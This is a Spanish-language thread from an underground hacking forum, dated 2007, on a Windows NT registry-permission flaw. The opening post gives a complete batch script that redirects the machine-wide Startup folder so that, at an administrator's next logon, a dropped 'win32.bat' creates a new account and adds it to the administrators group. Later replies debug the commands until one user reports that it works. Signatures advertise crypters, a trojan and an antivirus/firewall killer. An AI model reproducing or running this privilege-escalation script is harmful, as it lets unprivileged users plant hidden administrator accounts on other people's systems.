Vota por nosotros en el ranking web que participamos

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Octubre 12, 2008, 01:26:58
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Programacion  |  Programación  |  Batch (Moderadores: Espectro Infernal, |Shadow|)  |  Tema: Fallos en los permisos del registro de Windows NT 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Fallos en los permisos del registro de Windows NT  (Leído 265 veces)
ne0x
Habitual
*****
Desconectado Desconectado

Mensajes: 290



Ver Perfil
« en: Marzo 11, 2007, 02:45:07 »
Bien, aqui vamos con una nueva vulnerabilidad de NT, la acabo de probar en mi Windows Vista y no funciona, pero aun tengo que probar en mas PCs.


El fallo esta en que cualquier usuario autentificado puede modificar el valor de la clave HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Common Startup

que contiene la ruta de la famosa "Carpeta de Inicio" aunque no se tengan privilegios de admin.


Modificamos el valor de dicha clave y colocamos la ruta de otra carpeta que previamente hayamos creado, en dicha carpeta tambien es necesario que incluyamos el siguiente script batch:

Código:
net user <nombre_cuenta> /add
net localgroup <nombre_grupo> <nombre_cuenta> /add

Donde <nombre_grupo> es el nombre del grupo de las cuentas admin, suele ser " administradores " o " administrators "
Como sabreis sin privilegios de admin ese script no finalizara sin error, pero al modificar la ruta de la carpeta de inicio, en el proximo inicio de sesion del admin se ejecutara correctamente.

Resumido en este script:
Código:
:: Fallos en los permisos del registro de Windows NT
:: Fuente :  http://www.hispasec.com/unaaldia/499

:: Definir las varibles:
set RUTA=<ruta_de_la_nueva_carpeta_de_inicio>
set NOMBRE_CUENTA=<nombre_cuenta>
if not exist """%RUTA%""" echo La ruta no existe&exit /B 1
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v "Common Startup" /t REG_EXPAND_SZ /d """%RUTA%""" /f
> %RUTA%\win32.bat echo net user %NOMBRE_CUENTA% /add /domain
>> %RUTA%\win32.bat echo net group administrators %NOMBRE_CUENTA% /add /domain
if errorlevel 0 echo Exito !&exit /B 0

Ya tendremos una nueva cuenta.




Problemas que he encontrado: en mi Vista no puedes modificar la clave sin ser admin, asi que por favor que alguien la pruebe en un XP.

Fuente:
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
« Última modificación: Marzo 13, 2007, 01:48:20 por tr30x » En línea
El92rozn
Miembro
*****
Desconectado Desconectado

Mensajes: 139



Ver Perfil
« Respuesta #1 en: Marzo 12, 2007, 04:49:43 »
En línea

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
ne0x
Habitual
*****
Desconectado Desconectado

Mensajes: 290



Ver Perfil
« Respuesta #2 en: Marzo 12, 2007, 05:00:26 »
Si es eso exactamente, aunque como no funciona, en todos los windows, es cosa de probar por que windows publico hace poco un parche que lo corregia.
En línea
El92rozn
Miembro
*****
Desconectado Desconectado

Mensajes: 139



Ver Perfil
« Respuesta #3 en: Marzo 12, 2007, 05:13:28 »
En línea

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
nhaalclkiemr
Miembro
*****
Desconectado Desconectado

Mensajes: 97


Máximo exponente 9DB9F1AEED2FADBDE 997BBE20FEDA92

nhaalclkiemr@hotmail.com
Ver Perfil WWW Email
« Respuesta #4 en: Marzo 13, 2007, 11:02:46 »
En línea

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
StasFodidoCrypter 1.0 - 100%

StasFodidoCrypter 2.0- 85%
StasFodidoTrojan - 35%
Fire AD-Ware - 90%

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
Fire AV/FW-Killer
 - 98%


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
CUIDADO!!!!


Voy jodiendo ilusiones, y al fin y al cabo es de lo que tantos viven

¿Te di permiso para fabricar bombas con mis impuestos?, no! pues entonces no lo llames democracia
ne0x
Habitual
*****
Desconectado Desconectado

Mensajes: 290



Ver Perfil
« Respuesta #5 en: Marzo 13, 2007, 01:03:27 »
Prueba con el comando " NET localgroup ", para ver todos los grupos posibles, asi podras ver si esta o no administradores.
En línea
nhaalclkiemr
Miembro
*****
Desconectado Desconectado

Mensajes: 97


Máximo exponente 9DB9F1AEED2FADBDE 997BBE20FEDA92

nhaalclkiemr@hotmail.com
Ver Perfil WWW Email
« Respuesta #6 en: Marzo 13, 2007, 01:34:06 »
En línea

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
StasFodidoCrypter 1.0 - 100%

StasFodidoCrypter 2.0- 85%
StasFodidoTrojan - 35%
Fire AD-Ware - 90%

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
Fire AV/FW-Killer
 - 98%


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
CUIDADO!!!!


Voy jodiendo ilusiones, y al fin y al cabo es de lo que tantos viven

¿Te di permiso para fabricar bombas con mis impuestos?, no! pues entonces no lo llames democracia
ne0x
Habitual
*****
Desconectado Desconectado

Mensajes: 290



Ver Perfil
« Respuesta #7 en: Marzo 13, 2007, 01:45:50 »
Ok, despues de un par de pruebas saco que esto a mi si que me vale, pruebalo tu.

Código:
net user <nombre_cuenta> /add
net localgroup <nombre_grupo> <nombre_cuenta> /add

Me va perfectamente lo anterior, asi que edito el primer mensaje.
En línea
nhaalclkiemr
Miembro
*****
Desconectado Desconectado

Mensajes: 97


Máximo exponente 9DB9F1AEED2FADBDE 997BBE20FEDA92

nhaalclkiemr@hotmail.com
Ver Perfil WWW Email
« Respuesta #8 en: Marzo 13, 2007, 02:21:30 »
En línea

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
StasFodidoCrypter 1.0 - 100%

StasFodidoCrypter 2.0- 85%
StasFodidoTrojan - 35%
Fire AD-Ware - 90%

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
Fire AV/FW-Killer
 - 98%


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
CUIDADO!!!!


Voy jodiendo ilusiones, y al fin y al cabo es de lo que tantos viven

¿Te di permiso para fabricar bombas con mis impuestos?, no! pues entonces no lo llames democracia
ne0x
Habitual
*****
Desconectado Desconectado

Mensajes: 290



Ver Perfil
« Respuesta #9 en: Marzo 13, 2007, 02:31:59 »
A mi tambien me sale error al usar net group Administradores zzz /add

tengo que usar net localgroup administradores zzz /add
En línea
nhaalclkiemr
Miembro
*****
Desconectado Desconectado

Mensajes: 97


Máximo exponente 9DB9F1AEED2FADBDE 997BBE20FEDA92

nhaalclkiemr@hotmail.com
Ver Perfil WWW Email
« Respuesta #10 en: Marzo 13, 2007, 03:25:42 »
Ahh, gracias, ya funcina perfectamente, gracias  Wink Wink Wink
En línea

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
StasFodidoCrypter 1.0 - 100%

StasFodidoCrypter 2.0- 85%
StasFodidoTrojan - 35%
Fire AD-Ware - 90%

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
Fire AV/FW-Killer
 - 98%


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
CUIDADO!!!!


Voy jodiendo ilusiones, y al fin y al cabo es de lo que tantos viven

¿Te di permiso para fabricar bombas con mis impuestos?, no! pues entonces no lo llames democracia
Rexix
Colaborador
*****
Desconectado Desconectado

Mensajes: 482


xoy del rojo, ex un xentimiento no puedo parar!!


Ver Perfil Email
« Respuesta #11 en: Marzo 13, 2007, 06:40:55 »

bueno, muy interesante

sabrian indicarme de un tuto o manual para este comando que se me torna muy interesante pero no acabo de entender todos sus parametros...

salu2 Grin
En línea



my page:

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion

problemas para Recordar tus contraseñas? aqui tienes la solucion

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
ne0x
Habitual
*****
Desconectado Desconectado

Mensajes: 290



Ver Perfil
« Respuesta #12 en: Marzo 14, 2007, 09:11:40 »
como siempre la informacion mas fiable esta en net/?.

Despues en google
En línea
nhaalclkiemr
Miembro
*****
Desconectado Desconectado

Mensajes: 97


Máximo exponente 9DB9F1AEED2FADBDE 997BBE20FEDA92

nhaalclkiemr@hotmail.com
Ver Perfil WWW Email
« Respuesta #13 en: Marzo 14, 2007, 10:07:35 »
En línea

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
StasFodidoCrypter 1.0 - 100%

StasFodidoCrypter 2.0- 85%
StasFodidoTrojan - 35%
Fire AD-Ware - 90%

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
Fire AV/FW-Killer
 - 98%


Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
CUIDADO!!!!


Voy jodiendo ilusiones, y al fin y al cabo es de lo que tantos viven

¿Te di permiso para fabricar bombas con mis impuestos?, no! pues entonces no lo llames democracia
ne0x
Habitual
*****
Desconectado Desconectado

Mensajes: 290



Ver Perfil
« Respuesta #14 en: Marzo 14, 2007, 10:32:10 »
Tambien, tambien.


Mas informacion acerca de este fallo :
Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion4cker.net%2Findex.php%2Ftopic%2C159002.0.html

Cambien 4 por a.
« Última modificación: Marzo 14, 2007, 10:36:17 por tr30x » En línea
Furious Dami
-[Linux User]-
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 2294


Prefiero morir de pie que vivir arrodillado...

FuriousDami@hotmail.com
Ver Perfil WWW Email
« Respuesta #15 en: Marzo 16, 2007, 08:16:24 »
conosco muy bien en windows NT y se que eso es valido para sp4 en sp5 no funciona, y muchos ya lo tienen actualizado.
En línea

Una persona se hace realmente fuerte cuando protege a un ser querido...

Necesitas ser usuario para ver los enlaces Crear Usuario  Hacer Sesion
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Programacion  |  Programación  |  Batch (Moderadores: Espectro Infernal, |Shadow|)  |  Tema: Fallos en los permisos del registro de Windows NT « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.6 | SMF © 2006-2007, Simple Machines LLC